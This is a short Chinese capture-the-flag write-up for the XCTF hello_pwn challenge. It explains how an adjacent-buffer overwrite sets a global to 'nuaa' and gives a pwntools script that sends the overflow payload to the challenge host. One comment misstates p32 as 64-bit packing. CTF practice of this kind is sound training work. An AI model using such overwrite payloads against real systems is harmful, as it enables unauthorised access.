攻防世界-hello_pwn

用kali linux 打开

 习惯性的用ls没有什么用,然后查看是多少位

然后用64位IDA打开查看程序

 

 发现当unk_601068等于nuaa时才能得到flag

 

unk-601068和dword——60106C相差4 个字节,然后我们可以通过覆盖来改变dwod_60106c的赋值。

这种可以有俩种方法:

第一种:通过先输入四给任意字符再输入"aaun" (为什么是aaun呢,因为小端序和大端序的问题,小端序低地址存低位,大端序就是低地址存高位,这里采用小端序)

得到flag

第二种:就直接写exp

 

from  pwn import *
p=remote('61.147.171.105','62650')#连接远程靶机
p.recv()
payload=b'a'*4+p32(1853186401)#用4字节填充,再将1853186401打包成64位覆盖dword_60106C位置
p.sendline(payload)#将payload发送给程序	
p.interactive()进入交互界面成功拿到flag

然后执行

得到flag 

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值